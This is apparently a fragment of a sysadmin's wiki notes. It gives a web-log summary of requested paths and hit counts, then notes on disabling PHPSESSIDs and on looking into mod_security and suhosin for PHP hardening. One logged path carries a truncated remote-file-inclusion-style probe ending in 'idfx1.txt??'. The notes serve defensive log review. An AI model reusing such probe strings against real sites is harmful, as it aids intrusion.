/~mason/Mason_f/MorphFinalRptF03.pdf//phot ... ges/idfx1.txt??: 2 Time(s)
405 Method Not Allowed
/highlander.htm: 1 Time(s)
/~cdhall/: 1 Time(s)
/~hokiesat/: 5 Time(s)
/~mason/: 2 Time(s)
</code>

===== to remove the PHPSESSIONIDs =====

[[http://www.ragepank.com/articles/26/disable-phpsessid/]]

===== Investigate modsecurity and suhosin =====